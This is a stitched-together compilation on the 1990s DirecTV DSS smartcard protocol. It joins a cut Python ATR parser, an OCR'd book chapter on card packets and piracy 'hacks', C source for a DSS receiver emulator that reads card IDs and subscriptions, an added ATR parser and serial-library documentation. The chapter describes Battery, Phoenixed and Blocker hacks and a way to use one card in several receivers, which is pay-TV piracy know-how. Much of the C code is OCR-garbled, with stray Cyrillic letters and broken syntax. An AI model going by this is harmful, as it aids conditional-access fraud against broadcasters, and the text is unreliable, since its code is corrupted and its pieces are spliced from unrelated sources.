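FI_TABLE = {0: 372, 1: 372, 2: 558, 3: 744, 4: 1116, 5: 1488, 6: 1860,
            9: 512, 10: 768, 11: 1024, 12: 1536, 13: 2048}
DI_TABLE = {1: 1, 2: 2, 3: 4, 4: 8, 5: 16, 6: 32, 7: 64, 8: 12, 9: 20}
II_MA = {0: 25, 1: 50, 2: 100}    # TB1 programming current codes (mA)

# The ATR quoted in the text, already in direct-convention values (the
# DIREC reset() routine inverts the raw bytes when TS is 3Fh).
DSS_ATR = bytes.fromhex("3f 76 13 25 04 21 b0 11 4a 50 03")
CARD_CLOCK_HZ = 3_571_200         # assumption, see above


def parse_atr(atr):
    """Split an ATR into convention, interface bytes, historical bytes, TCK.

    Raises ValueError on a truncated ATR or a failed TCK checksum.
    """
    if len(atr) < 2:
        raise ValueError("ATR shorter than TS + T0")
    ts, t0 = atr[0], atr[1]
    if ts == 0x3F:
        convention = "inverse"
    elif ts == 0x3B:
        convention = "direct"
    else:
        raise ValueError("bad TS byte %02x" % ts)

    interface = {}                # e.g. {"TA1": 0x13, "TB1": 0x25, ...}
    protocols = set()             # T values announced in TD_i low nibbles
    y, pos, i = t0 >> 4, 2, 1     # Y1 = high nibble of T0 selects TA1..TD1
    while y:
        for bit, name in enumerate("ABCD"):
            if y & (1 << bit):
                if pos >= len(atr):
                    raise ValueError("ATR truncated in T%s%d" % (name, i))
                interface["T%s%d" % (name, i)] = atr[pos]
                pos += 1
        td = interface.get("TD%d" % i)
        if td is None:
            break                 # no TD_i: no further interface bytes
        protocols.add(td & 0x0F)
        y, i = td >> 4, i + 1

    k = t0 & 0x0F                 # number of historical bytes
    historical = atr[pos:pos + k]
    if len(historical) != k:
        raise ValueError("ATR truncated in historical bytes")
    pos += k

    # TCK is present only if a protocol other than T=0 was announced; the
    # XOR of every byte from T0 through TCK must then be zero.
    tck = None
    if protocols - {0}:
        if pos >= len(atr):
            raise ValueError("TCK missing")
        tck = atr[pos]
        pos += 1
        check = 0
        for b in atr[1:pos]:
            check ^= b
        if check:
            raise ValueError("TCK checksum failed")
    if pos != len(atr):
        raise ValueError("%d trailing byte(s) after ATR" % (len(atr) - pos))
    return {"convention": convention, "interface": interface,
            "protocols": protocols or {0}, "historical": bytes(historical),
            "tck": tck}


def timing(parsed, clock_hz=CARD_CLOCK_HZ):
    """Bit rates implied by TA1: the 372-cycle default and the negotiable one."""
    ta1 = parsed["interface"].get("TA1", 0x11)   # 0x11 is the ISO default
    fi, di = FI_TABLE.get(ta1 >> 4), DI_TABLE.get(ta1 & 0x0F)
    if fi is None or di is None:
        raise ValueError("TA1 %02x uses a reserved Fi/Di code" % ta1)
    return {"Fi": fi, "Di": di,
            "default_baud": round(clock_hz / 372),
            "negotiated_baud": round(clock_hz * di / fi),
            "extra_guard_etu": parsed["interface"].get("TC1", 0)}


def programming(parsed):
    """(volts, milliamps) from TB1, the programming-voltage byte of the era."""
    tb1 = parsed["interface"].get("TB1")
    if tb1 is None:
        return None
    return (tb1 & 0x1F, II_MA.get((tb1 >> 5) & 0x03))
```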


The VideoGuard Card Protocol 
• 58h (23 Bytes) 


The 58h packet contains the Fuse information and also what appears to be 
the first four bytes of the Electronic ID number. The Fuse information is byte 
00 and byte 12. The fuse data apparently identifies the state of the card. 
The values 05h or 25h indicate an active card whereas an 04h value would 
indicate a card that has been shut off. 


Bytes 01 to 04 seem to contain the four most significant bytes of the card 
Electronic ID number. This number is different from the Card Serial number 
as it seems to be used to address the card when authorising or 
deauthorising it. 


58h Packet Structure 
Byte 00: Fuse Data 00 
Bytes 01 to 04: Four Most Significant Bytes Card ID 
Byte 05: Card Issue Number (01) 
Bytes 06 to 11: ?? 
Byte 12: Fuse Data 01 
Bytes 13 to 23: ?? 
• 2Ah (119 Bytes) 


This packet conveys most of the critical information about the card to the 
decoder. The breakdown of the packet is given below. By modifying the 
results of this packet, it may well be possible to allow the card to be used in 
other IRDs. 


2Ah Packet Structure 
Byte 00: Fuse Data 00 
Bytes 01 to 03: Card Issue. Typically 21h B0h 11h From ATR 
Bytes 04 to 11: Card Serial Number 
Bytes 12 to 26: Electronic ID 
Bytes 27 to 54: IRD Box ID 
Bytes 55 to 118: Channel Subscriptions Details 


The Electronic ID number of the card is incorporated in the Electronic ID 
section. It is five bytes long. This is the number used by DSS to address the 
cards. 


The IRD Box ID contains the details of the IRD that the card was used in. In 
effect, the cards in the DirecTv system are married to specific IRDs. 
EXORing the first four bytes of the Electronic ID with the IRD Box ID 
produces the correct Box Number. This is so that a card cannot be used in 
more than one IRD. This could also mean that the first four bytes of the 
Electronic ID are EXORed with bytes 01 to 04 of the 58h packet. There is 
the possibility of a simple hack that will allow a card to be used in more than 
one IRD. 


Other Packets 


A number of other packets have been identified from logs. While this list is 
not complete, it is a start in understanding the DirecTv system protocol. 
Other aspects such as the use of the P bytes for signaling make the 
protocol more advanced than that used on the VideoCrypt system here in 
Europe. 


As the logs are somewhat limited, extrapolations of the functions of each 
packet have had to be made. It is probable that these will be revised when 
more data is available. 
• 4Ch (9 Bytes) 


This packet is believed by some North American sources to be the card 
serial number. However the fact that the card serial number is present in the 
2A packet may indicate that this is some other form of identification. 


• 40h (25 Bytes) 


This packet is possibly the data to calculate the seed. It is channel based 
and begins with 09h. This seems to be the flag for a packet containing 
critical information such as seed data or authorisation packets. 


The packet structure seems to be standard in that each packet begins with 
09h. Other elements seem to be the channel identifier, the programme 
identifier and a clock. The last five bytes appear to be some form of hash 
signature. 


• 54h (13 Bytes) 


This packet seems to be the seed. It is a larger seed than used in the 
VideoCrypt system. The 01h byte in the second last position may indicate 
whether the seed is valid or invalid. A more likely explanation is that it 
indicates how the seed is to be integrated in the generation of the next seed. 


• 4Ah (1 Byte) 


This packet is a single byte which appeared as 01h in the log. Given the use 
of the Fiat-Shamir ZKT in this system, it is likely that this is the Q byte in the 
process. 


• 5Ah (8 Byte Packet, 64 Byte Packet) 


The lengths of these packets indicate that they may be part of the 
Fiat-Shamir ZKT process. Normally the ZKT would be used by the card to 
authenticate itself to the IRD or decoder. If the authentication failed then the 
IRD would shut down. However a more logical arrangement would involve 
the ZKT being used internally in the card in the generation of the 
seed. The result of the ZKT would be EXORed against the seed output from 
the hash function. 


• 52h (4 Bytes) 


In the log, the contents of this packet was a string of zeroes. The function 
of these bytes is not yet known. 
• 5Eh (75 Bytes) 


This packet seems to be some form of tiering structure though it was mainly 
blank. 


• 5Ch (4 Bytes) 


In the log, the contents of this packet was a string of zeroes. The function 
of these bytes is not yet known. 


• 42h (31 Bytes, 44 Bytes, 18 Bytes) 


The authorisation workhorse of the system seems to be the 42h packet. 
This packet is used to address cards and authorise them or deauthorise 
them for channels or channel tiers. It has a variable length depending on the 
application. 


The card identification structure in this system would seem to be three 
tiered. There is an electronic serial number (the card ID), a card serial 
number and an embedded card number. The embedded number begins 
with a U (55h) and is followed by a set of digits. It seems that this number is 
used to individually authorise cards. Such an authorisation packet would 
include data from the card ID (the four most significant bytes), the card 
serial number, and the U number. 


Hacks On DirecTv 


The VideoGuard system suffers from the same problem that its European 
analogue variants, VideoCrypt-I and VideoCrypt-II, suffered from - it is 
totally compromised. There are currently two types of hack on the system; 
the Battery card and the Phoenixed cards. 


There are a number of Battery card variants. The original one was based on 
the Dallas 5002FP. Later versions have used the Dallas 5001 and 5000 
chips as the Dallas 5002FP has been in short supply. The circuit diagram 
for the 5001 variant is given in Chapter 4. 


These cards are not user-friendly in terms of reprogramming. The North 
American battery cards do not have a keypad. Instead they have a pad 
array that allows the card to be reprogrammed by a specific programmer 
unit. All updates to the Battery cards have been in the format of a new file. 
These files are labeled MAIN* where * is two digits referring to the release 
version. 


The fact that these files are encrypted according to the specific card means 
that they can be safely distributed via the internet and the BBSes. Of course 
this uncontrolled update path has led to some interesting developments. One 
such file distributed on the rec.video.satellite.dbs newsgroup was infected 
with a virus. 


The Phoenixed cards are a more recent development. These are official 
DSS smart cards that have been activated using a Phoenix program. The 
cards are referred to as Plastic which is something of a misnomer. However 
these reprogrammed cards are more of a threat to DirecTv as they 
constitute a direct assault on the subscriber management system. 


There are two other types of hack that are feasible; a SEASON hack and a 
Blocker hack. The SEASON hack is perhaps likely towards the absolute 
end of the DSS 01 card issue. Such a hack would run on PCs and perhaps 
MACs and would be in the same format as the Sky and D2-MAC SEASON 
hacks in Europe. In fact some of the same source code, specifically the 
communications routines, could be reused. 


The Blocker hack is perhaps of a similar threat level as the Phoenixed 
cards. It allows the lifetime of the official card to be extended and prevents 
the card from being turned off by the DSS subscriber management system. 
The bones of this hack have been outlined earlier and the main operation of 
this type of hack has been covered in the VideoCrypt section of the chapter. 


The PIC16C84 source code for the 09 Sky blockers is available on the 
WWW and FTP sites listed in Chapter 5. This code would of course have to 
be modified to read the different packets and operate at a higher baudrate. 


Naturally this Blocker hack is currently just a hypothetical one. There is only 
one way to test it and being on the other side of the Atlantic, that is difficult. 
If News Datacom have made the mistake of not chaining the 42h, 40h and 
54h packets then there is no reason why this hack should not work. Of 
course if News Datacom were clever and integrated nanocommands into 
the VideoGuard system, this hack would suffer the same fate as the Sky 
Genesis Blocker hack. 
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/* 
* DecoEm -- Videocrypt decoder emulator for DOS. 
* DSS IRD Emulator 
* 
* This software demonstrates, how a PC can communicate 
* with a Videocrypt smartcard over the serial port. Тһе 
* hardware required is the PCcard adapter as described in 
* ADAPTER. TXT. This program can also be used for building 
* software which communicates with other ISO 7816 conforming 
* smartcards that use the T=0 protocol. 
ж Markus Kuhn -- 19941121 
* 
* Modified to emulate а DSS IRD. 
* DSS Routines by Peter Pan 
* 
* European Scrambling Systems 5 - ISBN 1-873556-22-5 - Chapter 7 
* Compiles e.g. with Borland C++ 2.0, small model. 
* Link with ASYNC.0BJ as it comes with e.g. Season? 1.3. 
* 
/ 


#include <stdio.h> 

#include <stdlib.h> 

#include <ctype.h> 

#include <string.h> 

#include <time.h> 

#include <conio.h> /* for kbhit() & с1гѕсг() */ 
#include «dos.h» /* for int86() */ 

#include "async.h" 

#define CLK 3.571e6L /* CLK frequency in Hz delivered by adapter */ 
stdefine SECOND 1000000L /* one second in microseconds */ 
#define RESET ANSWER МАХ 33 


char reset answer[RESET ANSWER MAX] ; 

int reset length - 0; 

char header[5] = (0x48, 0x00, 0x00, 0x00, 0x00}; 
unsigned char msg[0x17]; /* 58h Result Array */ 
unsigned char msg2 [0x77] ; /* 2Ah Result Array */ 


/* message directions */ 
#define IN 0 /* to decoder */ 
stdefine OUT 1 /* to card */ 


/* 
* These are some delay values (microseconds) used in the program. 
* Use command line option w to modify them. 


БА 


#define DELAYS 1 

unsigned long delus [DELAYS] = { 

1000, /* wait after each outgoing byte */ 

2 

* Reverse and invert all bits in each byte of a string. 
* E.g. 10010111b (0x97) becomes 00010110b (0x16). 
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* 
/ 
void inverse(char *data, int len) { 
inti, ј; 
unsigned char c; 
for (i = 0; i < Леп; i++) { 
c=0; 
for (j =0; j < 8; j++) 
с |= C(data[i] & (1 < ])) !=0) < 7 - j); 
data[i] =~c; 
return; 
} 
/* 
* Uses a BIOS function in order to wait a specified number of 
* microseconds. This BIOS functions is only implemented in 
* ІВМ АТ compatible BIOSes (i.e., not in old PC and XT systems)! 
* The timing resolution of this function isn't really down 


* tolus on most systems, but it’s fine for our purposes. 
ap 


void wait_us (unsigned long microseconds) 


union REGS regs; 

if (microseconds == 0) return; 

regs.h.ah = 0x86; 

regs.x.cx = (int) (microseconds > 16); 
regs.x.dx = (int) (microseconds & Oxf fff) ; 
int86(0x15, &regs, &regs) ; 


return; 

} 

void activate_com(int com) 

{ 

int port, parity; 
switch (com) { 

case 1: port = COM1; break; 
case 2: port = COM2; break; 
case 3: port = COM3; break; 
case 4: port = COM4; break; 

default: 


printf("Port COM%d not available!\n”, com); 
exit(1); 


if (AsyncInit(port)) { 
printf("Can't initialize port COM%d!\n", com); 
exit(1); 

} 


AsyncHand(DTR | RTS); 

parity = (reset. answer[0] == Ox3f) ? ODD. PARITY : EVEN. PARITY; 
AsyncSet(9600, BITS. 8 | STOP. 2 | parity); 

return; 


) 
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void deactivate_com(void) 


{ 

AsyncHand(DTR | RTS); /* reset low */ 
AsyncStopO ; 

fprintf(stderr, "closed.Nn"); 

} 


/% 

* Send a string of bytes to serial port and wait for each single echo. 
* (More efficient send methods are too fast for decoder, it seems to 
* need more than 2 stop bits, so we wait between individual bytes.) 

li 

int send(char *data, int len) 


{ + : 
inti; 
char c; 
AsyncClear(); 
for (1 =0; 1 < Леп; i++) { 
с = data[i]; 
if (reset answer[0] == 0x3f) inverse(&c, 1); 
AsyncOut(c) ; 
while (AsyncInStat() == 0); 
AsyncIn(); 
wait us(delus[0]); 
} 
return 0; 
} 
/% 


* Get all bytes available from serial port FIFO and return how many 
* bytes were available. 


ж 
/ 
int receive(char “дата, int max) 
{ 
inti=0; 
while (AsyncInStat() > 0 && i < max) 
data[i++] =AsyncIn(); 
if (reset answer[0] == 0x3f) inverse(data, i); 
return i; 
} 
f* 


* Get n bytes from serial port FIFO. Don't wait more than timeout 
* microseconds and return how many bytes were avai lable. 
%4 


int receive timeout(char “дата, int п, long timeout) 
{ 
inti=0; 
while (i < п && timeout > 0) 
if (AsyncInStat() > 0) 
data[i++] =AsyncIn(); 
else { 


, 
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if (reset. answer[0] == Ox3f) inverse(data, i); 
returni; 

) 

/*
 * Perform a card reset. Try up to 10 times.
 *
 * Return value:  0  correct answer to reset received
 *               -1  reset failed
 */
int reset(void)
{
  int fail_count = 0;
  int y, p, i, err, tck_expected;
  int parity;

  reset_length = 0;
  AsyncClear();
  while (fail_count < 10) {
    AsyncHand(DTR | RTS);               /* reset low */
    wait_us(13000L);                    /* wait initial CLK cycles */
    AsyncClear();
    AsyncHand(DTR);                     /* reset high */
    wait_us(13000L);                    /* wait for answer */
    /* Read TS */
    if (AsyncInStat() != 0) {
      reset_answer[0] = AsyncIn();
      if (reset_answer[0] != 0x3b)
        inverse(reset_answer, 1);       /* not direct convention: try inverse */
      if (reset_answer[0] == 0x3f || reset_answer[0] == 0x3b) {
        if (AsyncInStat() < 1) wait_us(1000000L);
        /* Read T0 */
        if (receive(reset_answer + 1, 1) == 1) {
          tck_expected = 0;
          err = 0;
          p = 2;                        /* number of bytes read so far */
          /* Read TA_i, TB_i, TC_i, TD_i */
          y = reset_answer[p - 1] >> 4; /* Y1: which of TA1..TD1 follow */
          while (!err && y &&
                 p < RESET_ANSWER_MAX - 5 - (reset_answer[1] & 15)) {
            for (i = 0; !err && i < 4; i++) {
              if ((y >> i) & 1) {
                if (AsyncInStat() < 1) wait_us(1000000L);
                err |= receive(reset_answer + p, 1) != 1;
                if (i == 3) {           /* TD_i: protocol nibble and next Y */
                  tck_expected |= (reset_answer[p] & 15) != 0;
                  y = reset_answer[p] >> 4;
                }
                p++;
              } else
                if (i == 3) y = 0;      /* no TD_i: end of interface bytes */
            }
          }
          /* historic characters */
          if (!err) {
            if (AsyncInStat() < (reset_answer[1] & 15)) wait_us(1000000L);
            err |= receive(reset_answer + p, reset_answer[1] & 15) !=
                   (reset_answer[1] & 15);
          }
          p += (reset_answer[1] & 15);
          /* TCK */
          if (!err && tck_expected) {
            if (AsyncInStat() < 1) wait_us(1000000L);
            err |= receive(reset_answer + p, 1) != 1;
            p++;
            y = 0;
            for (i = 1; i < p; i++)     /* XOR of T0 .. TCK must be zero */
              y ^= reset_answer[i];
            err |= y != 0;
          }
          /* everything was fine */
          if (!err) {
            reset_length = p;
            parity = (reset_answer[0] == 0x3f) ? ODD_PARITY : EVEN_PARITY;
            if ((reset_answer[1] & 0x10) != 0 && reset_answer[2] == 0x31)
              /* we can't double CLK freq., but we can reduce baud rate */
              AsyncSet(4800, BITS_8 | STOP_2 | parity);
            else
              AsyncSet(9600, BITS_8 | STOP_2 | parity);
            return 0;
          }
        }
      }
    }
    fail_count++;
  }
  AsyncHand(DTR | RTS);                 /* reset low */
  return -1;
}
/*
 * Send a command (T=0 protocol) to the card and send/receive data.
 *
 * Return value:  0  command succeeded
 *               -1  command failed
 */
int command(int instruction, unsigned char *data,
            int length, int direction)
{
  char pb;                              /* procedure byte */
  char sw2 = 0;
  int i = 0;

  AsyncClear();
  length &= 0xff;
  instruction &= 0xff;
  /* INS values 6X and 9X, and odd INS values, are invalid in T=0 */
  if ((instruction & 0xf0) == 0x60 || (instruction & 0xf0) == 0x90 ||
      (instruction & 1) != 0)
    return -1;
  /* header[] is the global command header buffer (CLA INS P1 P2 P3) */
  header[0] = 0x48;                     /* CLA */
  header[1] = instruction;
  header[2] = 0x00;                     /* P1 */
  header[3] = 0x00;                     /* P2 */
  header[4] = length;                   /* P3 */
  if (length == 0 && direction == IN) length = 256;
  send(header, 4);
  header[0] = length;
  send(header, 1);
  do {
    do {
      if (receive_timeout(&pb, 1, 2 * SECOND) != 1) {
        fprintf(stderr, "procedure byte timeout, %d data bytes so far.\n", i);
        return -1;
      }
    } while (pb == 0x60);               /* NULL byte: card asks for more time */
    if (((pb ^ instruction) & 0xfe) == 0) {
      /* ACK = INS: transfer all remaining data bytes */
      if (direction == OUT) {
        for (; i < length; i++) { send((char *) data + i, 1); }
      } else
        for (; i < length; i++) {
          if (receive_timeout((char *) data + i, 1, 2 * SECOND) != 1) {
            fprintf(stderr, "data byte timeout, %d data bytes so far.\n", i);
            return -1;
          }
        }
    } else if (((pb ^ instruction) & 0xfe) == 0xfe) {
      /* ACK = ~INS: transfer exactly one data byte */
      if (direction == OUT)
        send((char *) data + i, 1);
      else if (receive_timeout((char *) data + i, 1, 2 * SECOND) != 1) {
        fprintf(stderr, "data byte timeout, %d data bytes so far.\n", i);
        return -1;
      }
      i++;
    } else {
      if ((pb & 0xf0) == 0x60 || (pb & 0xf0) == 0x90) {
        /* status word before all data was transferred */
        if (receive_timeout(&sw2, 1, 2 * SECOND) != 1)
          fprintf(stderr, "SW2 timeout.\n");
        printf("SW1 SW2 = %02x %02x, %d data bytes so far.\n",
               (unsigned char) pb, (unsigned char) sw2, i);
      } else
        printf("illegal procedure byte %02x, "
               "%d data bytes so far.\n", (unsigned char) pb, i);
      return -1;
    }
  } while (i < length);

  /* final procedure bytes */
  do {
    if (receive_timeout(&pb, 1, 2 * SECOND) != 1) {
      fprintf(stderr, "final procedure byte timeout.\n");
      return -1;
    }
  } while (pb == 0x60);
  if ((pb & 0xf0) == 0x60 || (pb & 0xf0) == 0x90)
    if (receive_timeout(&sw2, 1, 2 * SECOND) != 1) {
      fprintf(stderr, "SW2 timeout.\n");
      return -1;
    }
  if ((unsigned char) pb != 0x90 || sw2 != 0x00) {
    printf("SW1 SW2 = %02x %02x.\n", (unsigned char) pb,
           (unsigned char) sw2);
    return -1;
  }
  return 0;
}

int main(int argc, char **argv)
{
  int com = 1;
  int i, j, k;
  unsigned char serial[6];

  clrscr();
  for (i = 0; i < 76; i++) printf("*"); printf("\n");
  printf("\n DecoEm -- DSS IRD Emulator V1.0 CLA=48 \n");
  printf(" Based On DECOEM.C (c) 1994 Markus Kuhn \n");
  printf(" DSS Routines (c) 1996 Peter Pan\n\n");
  printf(" Run with option -h to get help.\n");
  printf(" Usage: 'DIREC n' where n is the Com Port \n\n");
  for (i = 0; i < 76; i++) printf("*"); printf("\n");

  for (i = 1; i < argc; i++) {
    if (isdigit(argv[i][0]))
      com = atoi(argv[i]);
    else
      for (j = 0; j < 999 && argv[i][j]; j++)
        switch (argv[i][j]) {
        case 'w':
        case 'W':
          /*
           * modify delay table, e.g. option wa200 waits 200 us after each
           * byte because this sets delus['a' - 'a'] = 200.
           */
          k = tolower(argv[i][j+1]) - 'a';
          if (k < 0 || k >= DELAYS || !isdigit(argv[i][j+2])) {
            printf("Only wait options between wa<ticks> and "
                   "w%c<ticks> possible.\n", 'a' + DELAYS - 1);
            exit(1);
          }
          j += 2;
          delus[k] = atol(argv[i] + j);
          while (isdigit(argv[i][j+1])) j++;
          break;
        case 'h':
        case 'H':
          printf("\n This is a DSS IRD Emulator program that uses the serial \n");
          printf(" port and a Phoenix type interface to read information from \n");
          printf(" a DSS Issue 01 card. \n\n");
          printf(" The information read from the card is the serial number, \n");
          printf(" the fuse settings, the Box ID and the Electronic ID of the \n");
          printf(" card. It also will show the channel tiers that the card is \n");
          printf(" subscribed to and the relevant expiry dates. \n\n");
          printf(" At present the knowledge of the package to channel tier \n");
          printf(" correlation is limited.\n\n");
          exit(0);
        default:
          break;
        }
  }

  fprintf(stderr, "Using serial port COM%d, byte delay %lu \xe6s.\n\n",
          com, delus[0]);
  activate_com(com);
  if (atexit(deactivate_com)) fprintf(stderr, "Can't call atexit()! \n");
  printf("RESET \n");
  if (reset()) {
    fprintf(stderr, "card reset failed.\n");
    exit(1);
  }
  for (i = 0; i < reset_length; i++)
    printf("%02x%c", (unsigned char) reset_answer[i],
           ((i & 15) == 15) ? '\n' : ' ');

  printf("\nSwitching To 38K4 Baud For Data Transfer\n");
  AsyncSet(38400, BITS_8 | STOP_2 | ODD_PARITY);

  /* Commands Sections */
  for (i = 0; i < 76; i++) printf("*"); printf("\n");
  printf("\n Command 0x58 - Get Fuse Information \n");
  if (command(0x58, msg, 0x17, IN))
  {
    fprintf(stderr, "Command 58 failed. \n");
    exit(1);
  }
  printf("\nResult Of 58 Command: \n");
  for (i = 0; i < 0xc; i++) printf(" %02X", msg[i]); printf("\n");
  for (i = 0xc; i < 0x18; i++) printf(" %02X", msg[i]);
  printf("\n");
  printf("\n Command 0x2a Read Card Information\n");
  if (command(0x2a, msg2, 0x77, IN))
  {
    fprintf(stderr, "Command 2A failed. \n");
    exit(1);
  }
  printf("\nResult Of 2A Command: \n");
  for (i = 0x00; i < 0x10; i++) printf(" %02X", msg2[i]); printf("\n");
  for (i = 0x10; i < 0x20; i++) printf(" %02X", msg2[i]); printf("\n");
  for (i = 0x20; i < 0x30; i++) printf(" %02X", msg2[i]); printf("\n");
  for (i = 0x30; i < 0x40; i++) printf(" %02X", msg2[i]); printf("\n");
  for (i = 0x40; i < 0x50; i++) printf(" %02X", msg2[i]); printf("\n");
  for (i = 0x50; i < 0x60; i++) printf(" %02X", msg2[i]); printf("\n");
  for (i = 0x60; i < 0x70; i++) printf(" %02X", msg2[i]); printf("\n");
  for (i = 0x70; i < 0x77; i++) printf(" %02X", msg2[i]); printf("\n");
  printf("\n");

  printf("Fuse Settings - %02X, %02x", msg[0], msg[12]);
  printf("\n\n");

  for (i = 0; i < 76; i++) printf("-"); printf("\n");
  printf("- Card Serial Number - \n"); printf("Hexadecimal Format: ");
  for (i = 4; i < 12; i++)
    { printf(" %02x", msg2[i]); }
  printf("\nDecimal Format: ");
  serial[1] = msg2[12];
  serial[2] = msg2[13];
  serial[3] = msg2[14];
  serial[4] = msg2[15];
  serial[5] = msg2[16];
  printf(" %07lu", ((unsigned long) serial[1] << 24)
         | ((unsigned long) serial[2] << 16) | ((unsigned long) serial[3] << 8) |
         ((unsigned long) serial[4]));
  printf("\n");

  for (i = 0; i < 76; i++) printf("-"); printf("\n");
  printf("- Electronic ID -\n");
  for (i = 12; i < 27; i++) printf(" %02X", msg2[i]);
  printf("\n\n");

  for (i = 0; i < 76; i++) printf("-"); printf("\n");
  printf("- IRD Box ID Number -\n");
  for (i = 27; i < 31; i++) printf(" %02X", msg2[i] ^ msg2[i-15]); printf("\n");
  for (i = 31; i < 42; i++) printf(" %02X", msg2[i]); printf("\n");
  for (i = 42; i < 55; i++) printf(" %02X", msg2[i]); printf("\n");
  printf("\n");

  for (i = 0; i < 76; i++) printf("-"); printf("\n");
  printf("- Channel IDs & Expiry Months -\n");
  for (i = 55; i < 71; i++) printf(" %02X", msg2[i]); printf("\n");
  for (i = 71; i < 87; i++) printf(" %02X", msg2[i]); printf("\n");
  for (i = 87; i < 103; i++) printf(" %02X", msg2[i]); printf("\n");
  for (i = 103; i < 119; i++) printf(" %02X", msg2[i]); printf("\n");
  printf("\n");

  for (i = 0; i < 76; i++) printf("-"); printf("\n");
  printf(" Expiry Dates: 0x32 = March 1996, 0x33 = April 1996 etc. \n");
  for (i = 55; i < 116; i += 4) {
    printf(" Channel Tier: %02X %02X", msg2[i], msg2[i+1]);
    printf(" Expires: Month %02X ", msg2[i+2]);
    printf(" Day %02u \n ",
           ((msg2[i] & 0xf0) & (msg2[i+3] & 0xf0)) ^ (msg2[i+3] & 0x0F));
  }
  return 0;
}
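Added here as a worked example (not code from the book or from DECOEM.C): a stand-alone C parser that walks an Answer To Reset the same way reset() above does (TS, T0, the TA/TB/TC/TD chain, historical bytes, TCK), but refuses a truncated ATR instead of reading past it and reports whether the TCK check byte is correct. The ATR bytes and all function names are constructed for this demonstration.

```c
/* Added example: ISO 7816-3 ATR parser with TCK validation (not from the book). */
#include <stdio.h>
#include <string.h>

struct atr_info {
    int inverse_convention;  /* TS was 0x3f (inverse convention) */
    int hist_len;            /* number of historical bytes, low nibble of T0 */
    int tck_present;         /* some TD_i announced a protocol other than T=0 */
    int tck_ok;              /* XOR of T0 .. TCK is zero (1 when no TCK is sent) */
    int length;              /* total ATR bytes consumed */
};

/* Undo inverse convention: a UART reading LSB first sees TS = 0x3f as 0x03.
 * Each byte is complemented and bit-reversed (what inverse() does above). */
unsigned char decode_inverse(unsigned char b)
{
    unsigned char r = 0;
    int i;
    for (i = 0; i < 8; i++)
        r |= (unsigned char)((((~b) >> i) & 1) << (7 - i));
    return r;
}

/* Parse n bytes of ATR into *out. Returns 0 on success, -1 if the ATR is
 * truncated or TS is not a valid initial character. */
int parse_atr(const unsigned char *atr, int n, struct atr_info *out)
{
    int p, i, y;

    memset(out, 0, sizeof *out);
    if (n < 2 || (atr[0] != 0x3b && atr[0] != 0x3f))
        return -1;
    out->inverse_convention = (atr[0] == 0x3f);
    out->hist_len = atr[1] & 0x0f;
    p = 2;
    y = atr[1] >> 4;                    /* Y1: presence bits for TA1 TB1 TC1 TD1 */
    while (y) {
        for (i = 0; i < 4; i++) {
            if ((y >> i) & 1) {
                if (p >= n) return -1;          /* interface byte missing */
                if (i == 3) {                   /* TD_i: protocol nibble, next Y */
                    out->tck_present |= (atr[p] & 0x0f) != 0;
                    y = atr[p] >> 4;
                }
                p++;
            } else if (i == 3)
                y = 0;                          /* no TD_i: chain ends */
        }
    }
    if (p + out->hist_len > n) return -1;       /* historical bytes missing */
    p += out->hist_len;
    if (out->tck_present) {
        unsigned char x = 0;
        if (p >= n) return -1;                  /* TCK missing */
        for (i = 1; i <= p; i++) x ^= atr[i];   /* T0 through TCK inclusive */
        out->tck_ok = (x == 0);
        p++;
    } else
        out->tck_ok = 1;                        /* T=0 only: no TCK is sent */
    out->length = p;
    return 0;
}

/* Wrappers returning plain ints so one call checks the whole parse. */
int atr_is_valid(const unsigned char *atr, int n)   /* well-formed and TCK ok */
{
    struct atr_info inf;
    return parse_atr(atr, n, &inf) == 0 && inf.tck_ok;
}
int atr_length(const unsigned char *atr, int n)     /* -1 when truncated */
{
    struct atr_info inf;
    return parse_atr(atr, n, &inf) == 0 ? inf.length : -1;
}

/* Constructed sample ATR: TS, T0 (Y1 = TA1 TB1 TD1, 3 historical bytes),
 * TA1, TB1, TD1 (T=1, Y2 = TC2), TC2, 'A' 'B' 'C', TCK.
 * TCK = XOR of T0 .. 'C' = 0xa9; the second copy has a corrupted TCK. */
static const unsigned char SAMPLE_ATR[] = {
    0x3b, 0xb3, 0x11, 0x00, 0x41, 0x0a, 0x41, 0x42, 0x43, 0xa9 };
static const unsigned char SAMPLE_ATR_BAD_TCK[] = {
    0x3b, 0xb3, 0x11, 0x00, 0x41, 0x0a, 0x41, 0x42, 0x43, 0xa8 };
#define SAMPLE_ATR_LEN ((int) sizeof SAMPLE_ATR)

int main(void)
{
    struct atr_info inf;
    if (parse_atr(SAMPLE_ATR, SAMPLE_ATR_LEN, &inf) == 0)
        printf("ATR ok: %d bytes, %d historical, TCK %s\n", inf.length,
               inf.hist_len, inf.tck_ok ? "good" : "BAD");
    printf("TCK check on corrupted copy: %d\n",
           atr_is_valid(SAMPLE_ATR_BAD_TCK, SAMPLE_ATR_LEN));   /* 0 */
    printf("ATR cut after 8 bytes -> %d\n", atr_length(SAMPLE_ATR, 8)); /* -1 */
    printf("TS 0x03 on the wire decodes to 0x%02x\n", decode_inverse(0x03));
    return 0;
}
```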


This is a set of rather simple serial communication routines written in
assembly, and to be called from C. If it is not stated elsewhere, this code is
public domain! Do with it as you wish, put it in your programs, etc, etc.

This is the second 'release' of the ASYNC functions. Since the first release
several people have contributed modifications to the routines, for which I
want to give them thanks and some credit where credit is due.
Roy M. Silvernail -- roy%cybrspc@cs.umn.edu -OR- cybrspc!roy@cs.umn.edu

For clarifying the documentation of AsyncHand() and AsyncSet(). He added
a few #define's to further clarify AsyncSet(). He also is responsible for
adding some error checking to AsyncInit() -- it now returns a non-zero on
error (when the COM port isn't there).

Steve Miller -- uunet!pictel!miller

For finding a rather obscure bug. If a character was received and sent at
exactly the same time, then it would stop receiving or sending characters.

Thanks again.


In addition, the buffer size has been increased from 1024 to 8196 
characters. 


Here is a list of all the files included in this package:

async.doc  - What you are reading.
async.h    - The C prototypes/header file
async.asm  - The assembly source
term.c     - The source for a simple terminal program
asyncs.obj - The .obj async.asm file for the SMALL model
asyncc.obj - The .obj for the COMPACT model
asyncm.obj - The .obj for the MEDIUM model
asyncl.obj - The .obj for the LARGE model
term.exe   - The executable for the terminal program


I have used these with Turbo C, and Turbo ASM without any problems. It
should work with Microsoft C and ASM, but a bit of re-writing will be needed
to make the assembler part work. I have also used it with Turbo C++ and
Turbo Assembler 2.0 without any problem, but you will have to treat the
Async functions as standard C, rather than C++.


Here is a short tutorial of the Async functions:

AsyncInit( int Port)
AsyncStop( void)

These functions start and stop the interrupt handlers. No characters can be
received if it isn't started, and the computer will crash if they are not stopped
before the program is exited. The parameter 'port' is the COM port to use;
